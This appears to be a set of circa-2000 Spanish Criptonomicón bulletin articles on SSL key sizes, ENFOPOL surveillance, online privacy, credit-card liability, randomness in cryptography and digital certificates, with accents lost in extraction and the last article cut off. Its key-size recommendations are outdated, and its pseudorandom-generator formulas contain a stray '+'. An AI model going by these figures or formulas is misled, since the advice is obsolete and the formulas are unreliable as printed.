Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos56.html (3 of 3) [25/10/2000 02:30:59 p.m.]

Las claves criptogrficas

Comercio electrnico

Criptologa y seguridad

Las claves criptogrficas

Cuestiones legales

Por Oscar Cnovas Reverte

Intimidad y privacidad

La incorporacin de tcnicas criptogrficas a los sistemas de comunicacin

Virus

ha propiciado que la criptografa y sus mtodos dejen de ser teoras oscuras,


conocidas por unos pocos, para convertirse en elementos tecnolgicos de
dominio pblico (cada vez es ms comn el establecimiento de servidores
web seguros basados en SSL). Sin embargo, dicha difusin ha provocado
tambin que muchos de los trminos relacionados con el tema sean
malinterpretados y confundidos, tanto por los usuarios como por los
profesionales de la informtica. La confusin suele venir propiciada,
normalmente, por el conocimiento parcial de la compleja teora que envuelve
a la criptografa.
En concreto, quisiera centrarme en un error cometido frecuentemente, y que
es fuente de confusin para los principiantes de la criptografa, como es el
tamao y tipo de las claves, aplicado en este caso al protocolo SSL.
SSL es un protocolo de comunicacin que proporciona principalmente tres
servicios bsicos de seguridad: confidencialidad , autenticacin e integridad .
Con el fin de garantizar dichos servicios, SSL hace uso tanto de la
criptografa asimtrica (basada en la existencia de un par de claves, la
pblica y la privada) como de la criptografa simtrica (basada en la
utilizacin de una nica clave secreta). La justificacin de dicha combinacin
viene dada por cuestiones de eficiencia, puesto que las transformaciones
criptogrficas (operaciones de cifrado y descifrado) realizadas mediante
tcnicas de criptografa asimtrica son del orden de diez mil veces ms
lentas que las realizadas con criptografa simtrica. SSL negocia en una
primera fase utilizando criptografa asimtrica (p.e. RSA), y cifra
posteriormente la comunicacin utilizando criptografa simtrica (RC4, RC5,
IDEA...).
La confusin viene provocada por esta combinacin de tcnicas que utiliza
distintos tipos de claves. Las claves empleadas en criptografa asimtrica
tienen justificacin matemtica, mientras que las que se utilizan en
criptografa simtrica suelen ser simples cadenas de bytes aleatorios. Esta

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos55.html (1 of 3) [25/10/2000 02:30:59 p.m.]

Las claves criptogrficas

diferencia de contenido hace que no sea comparable el tamao de las claves


simtricas y asimtricas.
El tamao de clave simtrica suele oscilar entre los 40 y los 128 bits. Las
claves de 40 bits, como las utilizadas por Netscape en su versin de
exportacin, pueden romperse en cuestin de horas, mientras que las claves
de 128 bits son irrompibles actualmente. Otros tamaos estndar de clave
son 56 bits (DES), que tampoco proporciona seguridad hoy en da, ya que
puede romperse en cuestin de das, u 80 bits (SKIPJACK). La seguridad
completa slo se consigue actualmente utilizando claves no inferiores a 80
bits.
Por otro lado, el tamao de clave asimtrica oscila entre los 512 bits y los
4096 bits. Las claves de 512 bits, tambin utilizadas por Netscape en su
versin de exportacin, han dejado de considerarse seguras ltimamente, y
no se recomienda el uso de claves inferiores a 768 bits.
La confusin es lgica, pero puede evitarse fcilmente identificando los
principales algoritmos criptogrficos y ubicndolos dentro de su categora
(simtricos o asimtricos).
Publicado en el Boletn del Criptonomicn #55.
Oscar Cnovas Reverte trabaja como investigador en temas de Infraestructuras de
Seguridad en la Facultad de Informtica de la Universidad de Murcia. Adems, imparte
peridicamente seminarios de criptografa, y ha colaborado activamente en el desarrollo
de proyectos como el Proyecto SSL, que dota a la Universidad de Murcia de una
infraestructura de clave pblica basada en certificados X.509.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos55.html (2 of 3) [25/10/2000 02:30:59 p.m.]

Las claves criptogrficas


Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos55.html (3 of 3) [25/10/2000 02:30:59 p.m.]

Por qu no me gusta ENFOPOL

Comercio electrnico

Criptologa y seguridad

Por qu no me gusta ENFOPOL

Cuestiones legales

Por Arturo Quirantes Sierra

Intimidad y privacidad

Cuando a mi hijo pequeo (edad: 2 aos) no le gusta algo, me lo pone muy


fcil: "no-e-gutta". Le gusta el zumo de pia y el monstruo de las galletas, y
no le gusta dormir la siesta o comer verduritas (al menos, no mientras haya
gusanitos a la vista). Y no hay ms que hablar. A los mayores nos cuesta
ms llegar a una conclusin, tal vez porque el mundo que conocemos es
ms complicado, ms extenso, o simplemente porque necesitamos ser
convencidos para hacer o dejar de hacer algo.

Virus

Por eso, cuando Enfopol apareci en el horizonte, la segunda pregunta (tras


la de qu es eso?) es casi inevitable: me gusta o no, y por qu? En tanto
que norma para facilitar el trabajo policial dentro de la Unin Europea,
Enfopol es una buena idea. Permite una mejor coordinacin policial, de
manera que un narcotraficante no pueda usar las fronteras internas para
evitar la vigilancia. Despus de todo, si en un par de horas podemos pasar
de Alemania a Blgica, Holanda, Francia y Luxemburgo, los esfuerzos
policiales se quedan en nada. Eso sin contar con que el seor narco puede
usar su flamante telfono Iridium que tiene acceso directo al satlite, cuya
base de operaciones se encuentra en Italia, o marear a la polica de media
Europa mediante sus redireccionamientos de correo electrnico. Decir no de
plano a la coordinacin de los esfuerzos policiales es una irresponsabilidad
en una poca de fronteras abiertas.
Pero igualmente malo, o peor, es firmar un cheque en blanco para que las
autoridades competentes se crean autorizadas a vigilarlo todo, en todas
circunstancias y sin permiso (o casi). Recordemos la ley Corcuera: muy
loable en sus objetivos de perseguir el crimen organizado, terrorismo y
narcotrfico; pero sus mtodos acabaron con una resolucin de
inconstitucionalidad y la dimisin de un ministro. Defendemos nuestra
intimidad, y en funcin de ello dejamos claro ante las autoridades hasta
dnde estamos dispuestos a dejar que lleguen.
Ante esas circunstancias, es buena o mala Enfopol? Cada cual debe sacar
sus propias conclusiones. Yo, personalmente, me encuentro incmodo con
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos54.html (1 of 4) [25/10/2000 02:31:00 p.m.]

Por qu no me gusta ENFOPOL

ella. Y los motivos, fundamentalmente, son los siguientes:


OPACIDAD. Enfopol es una de las resoluciones ms envueltas en el
secretismo oficial y oficioso. La resolucin Enfopol de 17 Enero 1995
fue acordada mediante un "procedimiento escrito" consistente en notas
de tlex entre los ministros comunitarios de la Unin. No hubo debate
pblico, ni tan siquiera consultas a los parlamentos nacionales o
europeo. Ms an, la resolucin ni siquiera fue publicada oficialmente
en el Diario Oficial de las Comunidades Europeas hasta el 4 de
Noviembre de 1996, !veintidos meses despus de su aprobacin!
Tuvimos que esperar a que en noviembre de 1998 periodistas de la
revista Telepolis destaparan el asunto (mediante un documento filtrado
probablemente por un europarlamentario) para enterarnos de lo que se
avecinaba. Lentas pero decididas, las fuerzas antienfopol se pusieron
en marcha. La Comisin de Derechos Humanos del Parlamento
Europeo dio su opinin negativa al proyecto. Intil. El 7 de Mayo de
1999, el Parlamento Europeo aprob la Resolucin Enfopol. Se espera
que este otoo el asunto quede definitivamente zanjado dentro de una
reunin de jefes de estado y gobierno en Tampere (Helsinki). Ante
tamaa apisonadora jurdica, mejor que la resolucin sea buena.
INDEFENSIN. La Resolucin Enfopol concede grandes poderes a las
llamadas "autoridades competentes" para realizar todo tipo de
interceptaciones, no slo en Internet, sino tambin en telefona fija y
mvil. El conjunto de datos que requieren se resume en una palabra:
todo. De hecho, el documento Enfopol filtrado (que es una extensin
del aprobado en 1995) contiene referencias restrictivas a temas como
la telefona por satlite y la criptografa. Respecto a esta ltima,
tenemos entera libertad de cifrar nuestros datos ... pero a condicin de
entregar a las autoridades nuestros mensajes en claro, o nuestras
claves criptogrficas, cuando lo requieran. Y si no lo hacemos
nosotros, los proveedores de servicios de Internet estn obligados a
hacerlo. Los operadores de Internet y de telefona se convierten en
apndices de la polica para la interceptacin, y pobres de ellos como
se retrasen un milisegundo en la entrega de los datos "requeridos"
ARBITRARIEDAD. Ante la gran variedad de datos de interceptacin a
solicitar por las autoridades competentes, sorprende la escasa
restriccin legal que stas tienen. Se supone que pueden hacer
prcticamente todo lo que deseen, con tal que tengan una orden de
interceptacin. Pero de tal orden solamente se dice que estar
"legalmente autorizada"; dicha autorizacin ser emitida por una
"entidad legalmente autorizada" Quin ser esa entidad? La nueva
polica europea (Europol)? Una comisin internacional? Un
organismo creado por los ministros de interior? De ser as, sera como
poner al zorro a vigilar el gallinero. Comprese con la cantidad de
requisitos judiciales que se requieren actualmente para cualquier
pinchazo telefnico o secuestro de correspondencia. Por otro lado,

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos54.html (2 of 4) [25/10/2000 02:31:00 p.m.]

Por qu no me gusta ENFOPOL

quines son las autoridades competentes? En el documento ingls


aparece la expresin "law enforcement agency", que puede significar
tanto agencias de polica como de espionaje (tipo CESID o CIA). Ni
siquiera han de limitarse al mbito europeo, ya que la agencia de
polica europea Europol (que, muy probablemente, tendra acceso a la
informacin de las interceptaciones) est autorizada para firmar
convenios de colaboracin con entidades similares extraeuropeas.
Esto permite que los datos recolectados mediante la resolucin
Enfopol puedan acabar en el FBI, la NSA o entidades similares de
diversos pases (algunos de los cuales, como Turqua o China, no son
precisamente fanticos devotos de los derechos humanos).
EL EFECTO "GRAN HERMANDAD" Resulta inquietante comprobar
cmo los esfuerzos europeos por regular la interceptacin de las
comunicaciones se corresponden con iniciativas similares en otros
lugares del mundo. En Estados Unidos, la ley CALEA aprobada hace
pocos aos por iniciativa del FBI, es prcticamente un "primo de
Zumosol" de Enfopol por su similitud; de hecho, fueron agentes del FBI
los que ayudaron a sus colegas europeos en los primeros pasos de
Enfopol. Todava no se han apagado los ecos de las protestas ante
Echelon, una gigantesca red de escuchas de carcter militar (formado
por EEUU, Canad, Nueva Zelanda y Australia) que tras el final de la
guerra fra est siendo ampliada para interceptaciones de carcter civil
y comercial en una escala sin precedentes. En Australia acaba de
aprobarse una legislacin bastante restrictiva con los contenidos de
pginas web, haciendo responsables de su contenido, o de su no
eliminacin, a los proveedores de Internet (matemos al mensajero).
Respecto a la criptografa, desde las leyes norteamericanas ITAR
sobre exportacin hasta el tratado de Wassenaar o el artculo 52 de la
Ley General de las Telecomunicaciones, todo son trabas. Dondequiera
que miremos, parece que los gobiernos estn ms preocupados por la
persecucin (real o imaginaria) de ciberdelitos que por la proteccin de
los derechos civiles.

Hasta que se regule judicialmente la forma y extensin de las


interceptaciones, se tenga un debate abierto y profundo sobre todos los
aspectos del tema con todas las partes implicadas y se saque todo a la luz,
la resolucin Enfopol no parece fruta apetecible. Pero si no la queremos,
debemos expresarlo nosotros mismos. Ya hay fuertes presiones al respecto
provenientes de proveedores de Internet y grupos pro-derechos de Alemania
y Austria.
Y una cosa muy importante: aunque la intencin de los pases firmantes es,
evidentemente, incorporarla en sus legislaciones nacionales, la resolucin
Enfopol NO ES VINCULANTE. Los gobiernos tienen la potestad de aceptarla
o no, y sern los parlamentos nacionales los que tengan la penltima
palabra. La ltima, por supuesto, es nuestra. Lo que hagamos en los
prximos meses ser determinante para conocer cmo ser Internet en el
file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos54.html (3 of 4) [25/10/2000 02:31:00 p.m.]

Por qu no me gusta ENFOPOL

siglo XXI. Mientras agrupamos nuestras fuerzas, no es mala idea recordar


que esto nos concierne a todos, internautas o no, mucho ms que otros
temas con los que nos bombardean en los informativos. En palabras de mi
paisano, Miguel Ros:
No me preguntes cmo ha sido
que te hemos elegido a ti.
Hoy el mundo est en conflicto
y hemos decidido intervenir...
Publicado en el Boletn del Criptonomicn #54.
Arturo Quirantes Sierra es profesor de fsica de la Universidad de Granada y autor de las
famosas pginas entre los seguidores de este boletn, el "Taller de Criptografa", donde
destaca ltimamente la intensa labor de informacin que est realizando en una cruzada
contra Enfopol.

Informacin adicional

Zona ENFOPOL

Privacidad y sociedad en Red

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos54.html (4 of 4) [25/10/2000 02:31:00 p.m.]

Privacidad y sociedad en Red

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Privacidad y sociedad en Red

Con la irrupcin del nuevo paradigma de la Sociedad de la Informacin, a la


que Espaa se suma tmidamente, la circulacin de la informacin alcanza
cotas inimaginables de fluidez hace tan slo unos aos. Cada da ms
aspectos y actividades de la vida cotidiana tienen su reflejo y su rplica en
mundos virtuales. Ya no es necesario presentarse en Hacienda ni en el
banco ms prximo para entregar la Declaracin de la Renta, se pueden
completar transacciones bancarias por telfono o por Internet, resulta posible
comprar cmodamente acciones, pelculas, coches, cualquier cosa que se
pueda imaginar, pulsando un par de veces el ratn, los empleados leen el
peridico digital desde sus puestos de trabajo, se baraja ya la posibilidad de
votar por Internet en los prximos comicios, se pueden seguir los
Sanfermines en lnea, en definitiva, Internet est pasando a formar parte del
da a da, como la televisin o el caf de las doce, y con el tiempo sern ms
las parcelas del quehacer diario que se trasladarn a este novedoso medio.
A poco que se examinen los ejemplos citados, uno comprende que en la
mayora de los casos se trata de actividades que estn vinculadas
directamente con la privacidad de los ciudadanos, por referirse
fundamentalmente a la esfera econmica/financiera. El derecho a la
intimidad y la privacidad, recogido en nuestra Constitucin y protegido por
ella, se vuelve, si acaso, an ms necesario y merecedor de amparo cuando
la tecnologa posibilita formas de comunicacin universales, que en el caso
de Internet y del telfono, y mientras no se adopten medidas preventivas,
son extremadamente sencillas de atacar y vulnerar. La criptografa se erige
as en esa delgada barrera que vela por la conservacin de la privacidad en
las comunicaciones, sean stas para transmitir datos bancarios o
simplemente felicitaciones a la abuela por su cumpleaos. En la nueva
Sociedad de la Informacin, no puede entenderse una democracia sin
garanta de privacidad.
Sin embargo, esta lgica aspiracin de los ciudadanos a comunicarse
libremente con quien quieran sin que nadie interponga sus hocicos

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros07.html (1 of 3) [25/10/2000 02:31:00 p.m.]

Privacidad y sociedad en Red


Consejos prcticos

Referencias

husmeadores, parece chocar de frente con los planes de seguridad nacional


de los estados, que contemplan la criptografa ms como amenaza terrible
en manos de terroristas y narcotraficantes que como instrumento garante de
la intimidad de los ciudadanos. Nos encontramos ante una situacin en la
que entran en conflicto los intereses del ciudadano y del Estado.

Libro de Visitas

Si el ciudadano transige y pasivamente se deja hacer en materia


criptogrfica, dejando primar sobre sus propios derechos las aspiraciones
parlamentarias de control absoluto sobre las comunicaciones, puede darse
cuenta demasiado tarde de que vive en un estado policial. Nuestros perros
guardianes parecen ms interesados en repartir dentelladas a todo el que se
arrime a la cerca que en discernir lachas de merinas. Los turbios manejos de
los pases comunitarios en materia de intervencin de las comunicaciones,
de los que Espaa tambin participa, ms se asemejan a ficcin orwelliana
que a resolucin de una Europa democrtica.
ENFOPOL pretende desplegar una gigantesca red de escucha y vigilancia
por la Unin Europea, para intervenir sin mandato judicial todo tipo de
comunicaciones privadas, ya sean telefnicas o por Internet. La criptografa
no saldr mejor parada si ENFOPOL prospera, ya que se exige la existencia
de puertas traseras y de informacin complementaria para descifrar
documentos cifrados usando criptografa fuerte. Al da de hoy, ENFOPOL se
encuentra sumido en el secretismo ms absoluto y su falta de transparencia
permite imaginar que sus acciones rozan la ilegalidad, si es que no cruzan
abiertamente al otro lado.
El dilema tico que se nos plantea consiste pues en dnde trazar la sutil
frontera entre la seguridad nacional y la infraccin de los derechos del
individuo. Estado policial o Estado seguro? Sacrificio de nuestra
privacidad en aras de un bien mayor o cmara de vigilancia electrnica de
todos los ciudadanos? Estos son algunos de los interrogantes que plantea
ENFOPOL y a los que en una democracia deberamos buscar respuesta
todos, no slo una oscura comisin de la que el ciudadano no conoce ni su
existencia.
Publicado en el Boletn del Criptonomicn #53.

Informacin adicional

Zona ENFOPOL, de Arturo Quirantes, contiene la ms completa relacin de


enlaces y documentos sobre ENFOPOL en castellano.
Es posible la privacidad absoluta en las redes?

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros07.html (2 of 3) [25/10/2000 02:31:00 p.m.]

Privacidad y sociedad en Red

envirselo por correo electrnico. No tienes ms que indicar la direccin del


destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros07.html (3 of 3) [25/10/2000 02:31:00 p.m.]

Seguridad de las tarjetas de crdito en Internet

Comercio electrnico

Criptologa y seguridad

Seguridad de las tarjetas de crdito en Internet

Cuestiones legales

Por Jos Picn Rodrguez

Intimidad y privacidad

Es de sobra conocido que la mayor traba a la expansin del comercio

Virus

electrnico a travs de redes abiertas es la sensacin de inseguridad que


experimentan los consumidores y usuarios a la hora de transmitir datos
confidenciales, en especial los nmeros de sus cuentas bancarias o tarjetas
de crdito. Tcnicas como la firma electrnica, de la que ya se ha hablado
en varias ocasiones en Criptonomicn, suponen un avance en lo relativo a la
seguridad on-line. No hay que olvidar, empero, que cualquier avance
informtico en esta materia no debe entenderse al margen de las
disposiciones legales vigentes. Lo que es tcnicamente seguro no tiene por
qu ser jurdicamente seguro, ni lo jurdicamente vlido tiene siempre que
estar ligado a tcnicas de seguridad infalibles. Es por lo que en este artculo
creemos conveniente dar una pincelada, no tanto de los aspectos de la
seguridad tcnica de la red a la hora de realizar transacciones comerciales,
como de su seguridad desde el punto de vista legal. En especial, nos
centraremos en lo relativo al uso de tarjetas bancarias on-line.
Consideramos este tema muy interesante debido a la cantidad de ideas y
temores, muchos infundados, que continuamente se propagan en los medios
de comunicacin. Por poner un ejemplo, el mayor temor de los usuarios de
tarjetas es el que algn desaprensivo se apodere del nmero de dichas
tarjetas y las use discrecionalmente, lo que, creen, supondra perder el
importe de los cargos efectuados a su cuenta. Sin embargo, existen
preceptos y principios legislativos que eximiran al titular de la tarjeta de
crdito de responder por cualquiera de estos cargos.
La nica forma de que un tercero realice pagos electrnicos con una tarjeta
ajena es prescindiendo de la firma digital, pues sta le identificara al
instante y dejara en evidencia que la identidad de la persona que utiliza la
tarjeta y el titular de la misma no coinciden. Es por ello que el usurpador
deber realizar los pagos a travs de un sistema que no permita su
identificacin. Y aqu es donde entra en juego la Ley, pues en el artculo 46
de la Ley de Comercio Minorista se establece que cuando el importe de una

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos53.html (1 of 2) [25/10/2000 02:31:01 p.m.]

Seguridad de las tarjetas de crdito en Internet

compra hubiese sido cargado utilizando el nmero de una tarjeta de crdito,


sin que sta hubiese sido presentada directamente o identificada
electrnicamente, su titular podr exigir la inmediata anulacin del cargo.
De esta forma se llega a la conclusin de que el uso de tarjetas de crdito en
la red no supone un problema... al menos para los consumidores y usuarios
de la red. Y es que la parte dbil en las transacciones electrnicas es el
comerciante, que es a quien corresponde probar que su abono est
justificado (a no ser que responda el Banco o entidad financiera titular de la
tarjeta, todo depende del contrato que tenga con el comerciante).
Es por ello que se deduce que el avance en las tecnologas de seguridad en
la red basadas en el cifrado y la firma digital son necesarias para el
establecimiento de un comercio electrnico seguro, sin perjuicio de que,
hasta que su implantacin se generalice, los mayores perjudicados de la
falta de seguridad en las redes no sern los consumidores y usuarios sino
las empresas que ofrecen sus productos a travs de la Red.
Publicado en el Boletn del Criptonomicn #53.
Jos Picn Rodrguez es abogado de Derecho Informtico y Comunicaciones.

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos53.html (2 of 2) [25/10/2000 02:31:01 p.m.]

El azar en la criptografa

Comercio electrnico

Criptologa y seguridad

El azar en la criptografa

Cuestiones legales

Por Germn Sez i Moreno

Intimidad y privacidad

Qu son los nmeros aleatorios?

Virus

Las sucesiones de nmeros o bits aleatorias son sucesiones de nmeros o


bits seleccionados al azar de forma uniforme, es decir, todo nmero o bit
tiene la misma probabilidad de ser escogido. Formalmente se requiere que
sean estadsticamente independientes e insesgados. El ejemplo clsico ms
utilizado para generarlos es el del lanzamiento repetitivo de una moneda
ideal no trucada. Identificando 0 con cara y 1 con cruz, obtenemos una
sucesin de bits aleatoria. Es indiferente hablar de nmeros o de bits
aleatorios, ya que agrupando bits obtenemos nmeros y seleccionando
determinados bits de los nmeros obtenemos sucesiones de bits.
Existen otros dispositivos fsicos de los que se supone que generan nmeros
aleatorios. Algunos de los que se consideran son la medida del ruido trmico
de un diodo semiconductor o de una resistencia, o bien la medida de la
inestabilidad en frecuencia de un oscilador libre.
Para qu sirven?
En la vida cotidiana se utilizan nmeros aleatorios en situaciones tan
dispares como pueden ser los juegos de azar o en el diseo de la cada de
los copos de nieve en una animacin por ordenador. El mundo tecnolgico
no est libre de su utilizacin y por ejemplo se utilizan en tests para
localizacin de errores en chips. En la transmisin de datos desde un satlite
tambin se utilizan nmeros aleatorios. Su utilizacin en las finanzas es otra
de las muchas aplicaciones.
En general cuando se requiere una impredecibilidad en unos determinados
datos, se utilizan nmeros aleatorios. Aqu es donde entra en juego la
criptografa. As en la telefona mvil digital GSM se utilizan para la
asignacin de una clave aleatoria que sirve para autenticar al usuario o por
ejemplo tambin se utilizan para dar cierta seguridad a la asignacin inicial
de nmeros secretos a las tarjetas de crdito. Para muchos sistemas
criptogrficos, como pueden ser DES, RSA, DSA, la utilizacin de nmeros

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos52.html (1 of 4) [25/10/2000 02:31:01 p.m.]

El azar en la criptografa

aleatorios es vital para su seguridad.


En el campo de la Matemtica Aplicada tambin se utilizan en ciertos
procesos de Anlisis Numrico, o en cualquier algoritmo que precise una
eleccin aleatoria de un dato. As, destaca el Mtodo de Montecarlo con el
que, por ejemplo se puede calcular una aproximacin del nmero PI slo
lanzando aleatoriamente tiros sobre una diana inscrita en un cuadrado, como
se puede observar en el experimento de la figura (puede obtenerse en
www.iec.csic.es/criptonomicon/articulos/aleat.gif).
Este mtodo se basa en el hecho que el rea del crculo dividida por el rea
del cuadrado es PI/4 y a la vez coincide con el nmero de tiros acertados
dividido entre el nmero de tiros lanzados (cuando el nmero de tiros es
suficientemente grande). En este ejemplo despus de lanzar 44 tiros
aleatorios, se han obtenido 35 dentro de la diana que nos proporcionan una
aproximacin de PI/4 = 0,7954 (el valor exacto es PI/4 = 0,785398...). Con
este mismo mtodo se pueden calcular todo tipo de integrales definidas de
forma aproximada. El Mtodo de Montecarlo se utiliza en muchas
simulaciones, como por ejemplo, en el estudio del paso de neutrones por
una placa.
Qu son los nmeros pseudoaleatorios?
Son unos nmeros generados por medio de una funcin (determinista, no
aleatoria) y que aparentan ser aleatorios. Estos nmeros pseudoaleatorios
se generan a partir de un valor inicial aplicando iterativamente la funcin. La
sucesin de nmeros pseudoaleatorios es sometida a diversos tests para
medir hasta qu punto se asemeja a una sucesin aleatoria.
Por qu hay que recurrir a los nmeros pseudoaleatorios?
Fundamentalmente porque las sucesiones de nmeros pseudoaleatorios son
ms rpidas de generar que las de nmeros aleatorios.
Los dos principales inconvenientes de las sucesiones de nmeros
pseudoaleatorios es que a partir de un mismo valor inicial se genera la
misma sucesin y que, en general, la sucesin es peridica. Estos
inconvenientes se solucionan escogiendo generadores con periodos largos.
De todas maneras, en muchas aplicaciones son tiles estos defectos, ya que
nos ir bien que la sucesin parezca aleatoria, pero a la vez conozcamos
que los nmeros se repiten peridicamente y cul es la longitud del periodo.
Tambin cuando se quiere repetir un experimento en las mismas
condiciones, nos interesar partir del mismo generador y con el mismo valor
inicial.
Cmo se generan las sucesiones pseudoaleatorias?
Uno de los primeros mtodos conocidos es debido a John von Neumann
(1903-57). Una versin de este mtodo consiste en partir de un nmero

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos52.html (2 of 4) [25/10/2000 02:31:01 p.m.]

El azar en la criptografa

inicial de 10 cifras, elevarlo al cuadrado y seleccionar como nuevo nmero


aleatorio las cinco 5 centrales. Siendo cautos en la eleccin del valor inicial e
iterando el proceso se obtiene una sucesin de nmeros pseudoaleatorios.
Un mtodo utilizado en criptografa muy relacionado con este ltimo es el
debido a L. Blum, M. Blum y M. Shub (1986). En este mtodo la manera de
iterar a partir de un valor inicial x(1) viene dada por la frmula x(i+1) = x(i)^2
+ mod (p*q), con p y q primos congruentes con 3 mdulo 4. Una
generalizacin es el llamado generador RSA dado por x(i+1) = x(i)^d + mod
(p*q), con p, q primos y d un nmero que verifica que mcd(d, (p-1)*(q-1)) = 1.
Se han propuesto otros generadores como pueden ser los basados en
sucesiones de registros de desplazamiento, en autmatas celulares o en
hashing.
Por qu son tan importantes para la criptografa?
La generacin de nmeros pseudoaleatorios es necesaria en diversos
sistemas criptogrficos, como por ejemplo a la hora de generar la clave en
los sistemas one-time pad, en el DES, RSA, DSA, etc. Para muchos
sistemas criptogrficos, la utilizacin de nmeros pseudoaleatorios es vital
para su seguridad. Esto es, fundamentalmente, porque la eleccin de las
claves tiene que ser aleatoria para que as sean impredecibles para un
oponente. Tambin se utilizan estos nmeros en los clculos intermedios
que realizan los sistemas criptogrficos.
Las razones dadas hasta aqu son las que explotan el parecido de las
sucesiones pseudoaleatorias con las aleatorias. Debido a que la transmisin
y almacenaje de nmeros aleatorios no es prctica se usan generadores
pseudoaleatorios porque slo se requiere almacenar y transmitir la semilla
que genera la sucesin.
Publicado en el Boletn del Criptonomicn #52.
Germn Sez i Moreno, Univesidad Politcnica de Catalua

Informacin adicional

Artculos publicados
Puedes consultarlos por temas, o tambin por orden de aparicin en el boletn.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos52.html (3 of 4) [25/10/2000 02:31:01 p.m.]

El azar en la criptografa

Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/articulos/expertos52.html (4 of 4) [25/10/2000 02:31:01 p.m.]

Qu son los certificados digitales

Comercio electrnico

Criptologa y seguridad

Qu son los certificados digitales

Cuestiones legales

Por Fernando Martnez

Intimidad y privacidad

Uno de los problemas que surgen en Internet es el de la identificacin de las personas

Virus

o entidades, por Ejemplo, cmo asegurarnos de que una clave pblica que hemos
encontrado en Internet pertenece realmente a quin dice pertenecer.
Una posible solucin es la utilizacin de un certificado digital que es fichero digital
intransferible y no modificable, emitido por una tercera parte de confianza (AC), que
asocia a una persona o entidad una clave pblica.
Un certificado digital que siga el standard X509v3, utilizado por los navegadores,
contiene la siguiente informacin:
Identificacin del titular del certificado: Nombre, direccin, etc.
Clave pblica del titular del certificado.
Fecha de validez.
Nmero de serie.
Identificacin del emisor del certificado.
Un ejemplo sera:
issuer: C=ES ST=L=Barcelona O=SECURITY ZUTANEZ OU=Division de
certificados CN=Fulano Menganez Email=Fulano@fulanez.es subject:
